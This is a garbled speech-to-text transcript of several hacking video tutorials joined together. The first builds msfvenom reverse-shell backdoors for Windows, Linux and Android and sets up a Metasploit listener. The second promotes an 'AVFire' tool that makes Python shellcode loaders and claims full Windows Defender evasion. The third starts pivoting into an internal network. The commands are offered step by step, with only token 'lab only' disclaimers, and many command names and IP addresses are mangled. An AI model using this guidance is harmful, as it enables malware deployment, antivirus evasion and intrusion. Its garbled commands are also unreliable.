Set up full reverse shell test. Everything step by step exactly, so you can follow easily. Before generating, make sure you know your attacker IP. Run ifconfig. We'll assume your IP is 192.168.168.100 and port 4444. Let's begin forging the payloads. Windows backdoor XE command MSF Venom P Windows Metasploit reverse GCP LH host equals 192.168.168.100 L port equals 4444 EEX86 / Shikata Garnai I3 for X greater than win backdoor .x explanation clean and direct MS Venom payload generator P Windows in Metasploit reverse TCP Windows Metasploit reverse shell LHOST / LPORT your IP and port dash EX86 / Shikataga the encoder to help hide payload dash I3 encode 3 times dash FX output format is Windows XE greater than win backdoor .exe save as file. This creates a Windows backdoor you can run inside your lab. Linux backdoor ELF command MS Venom P Linux x64 Metasploit reverse GCP LHOST equals 192.168.168.100 L port equals 4444 EX64 TOS countdown I3 FELF greater than lin underscore backdoor.elf explanation Linux x64 Linux 64-bit payload same reverse TCP structure as Windows x64 countdown encoder FELF Linux executable format save output as lin backdoor.elf make it executable HMOD plus x lin backdoor.elf Android backdoor APK command MSF Venom dash P Android / Metasploit / reverse underscore TCP LHOST equals 192.168.168.100 L port equals 4444 dash FAPK greater than and underscore backdoor .apk explanation Android / Metasploit Android remote access no encoder needed dash FAPK create installable Android app APK will install on your phone if unknown sources is enabled. Setting up listener multi-handler open MS console. Load the handler use multi-handler. Set matching payload set payload Android Metasploit reverse charge TCP set lost 192.168.168.100 set L port 4444 run listener exploit J. Now your machine is waiting for incoming connections. Testing Android backdoor reverse shell. Start a simple HTTP server. Python 3-m http.server 8080. On your phone, open browser http://192.168.168.100 and underscore backdoor.apk install open. Wait for callback. Back on Metasploit sessions I1 test with sysinfo webcam snap shell reverse shell working. You've just created backdoors for Windows, Linux and Android using MSF Venom and connected them through a real reverse shell. In part 10, we'll take this even further. How to evade antivirus and hide your payloads. Subscribe if you're ready for the next level. What if one file could walk straight through Windows Defender, completely invisible, no noise, no alerts, no detection? Today, we're building an undetectable payload using Python shellcode, and I'll show you every step, safely, educationally, and clearly. This is not malware. This is cybersecurity education. Like the video, subscribe for mastery, and let's awaken. Alright hackers, welcome back. Today we're using my custom tool, written in Python, called AV Fire. 100% working, clean, educational, and designed for safe lab use only. Open your browser and type github.com/acw360 .com/avfire. This is the tool repository. Before we continue, scroll down and rate the tool with a star and hit follow. Trust me, you'll need a GitHub account as a cybersecurity student. Scroll down to installation. Copy the installation command. Open your terminal and paste git clone https github.com acw360 avfire. After the clone finishes, cd avfire python 3 avfire.py. Now the tool opens and shows the menu. 1. Generate payload. 2. Start listener. Perfect. Let's generate our undetectable Python shellcode payload. Select option 1. The tool asks, enter is used. Open a new terminal type. If config. Copy your local IP, EEG 192.168.2.27.106. Paste it, press enter. Next, enter. L port. I'm using 8443. Enter. Next, enter output, Python file. Name, example, backdoor.py. Make sure it ends with .py. Now the tool starts working, generates undetectable shellcode, creates a loader, builds the final Python payload. This takes 30 to 60 seconds, depending on your machine. When done, you get backdoor.py, open your browser, search virustotal.com. Most evasion tools warn you not to upload payloads to VirusTotal because it trains the antivirus engines. But AVFire is my own tool. I trust it 100% for educational testing. Click Choose File. Select backdoor.py. Confirm the scan starts. Zero detections, zero warnings, full evasion. This shows how powerful Python shellcode loaders are, but only use them in labs. Now we test on Windows 10 lab machine. But before we run it, we must start the listener. Back to AVFire. Choose 2. Enter your host and a port. Again press enter. Now, AVFire automatically opens Metasploit and sets up the listener. You'll see, started reverse TCP handler on 192.168.2.27.106:8443. Perfect. Go back to your AVFire folder and start a Python HTTP server. Python 3-m http.server 8080. On your Windows machine, open CMD. You get http://192.168.227.106:8080/backdoor.py. Check your Windows Defender. Real-time protection on. Cloud protection on. Tamper protection on. Everything active. But it cannot detect the file because the shellcode is obfuscated. Now run it, Python backdoor.py. Switch back to Kali. Boom, reverse shell obtained. Metasploit shows Metasploit session 1 opened. Enter sessions-I1. You're inside. If the target doesn't have Python installed, no problem. Exit. Metasploit, exit, run exploit again in background. Exploit-J, now in Windows. Install PyInstaller, pip install PyInstaller. When done, PyInstaller-F, backdoor.py-no console. After building, go to dist/, you'll see backdoor.x. Run it with double-click, switch to Kali, Metasploit shell again. Success. Python shellcode, zero detection. Today, you mastered a real cybersecurity technique. But in the next video, we go deeper into pivoting, where you can take over the whole company network. Like the video, subscribe, and comment AVFIRE if you succeeded. One host hacked? Good. But stopping there is for beginners. Real attackers move sideways, deeper, and break into systems you can't even see. Today, we pivot from a compromised Windows host into a hidden Windows server buried inside the network. Let's begin. We already compromised the Windows machine at 192.168.57.100. Now we'll use it as a bridge to reach Metasploitable 3 inside the same LAN. Show session, sessions. Switch back to Metasploit, sessions-I1, then show Windows internal IP config.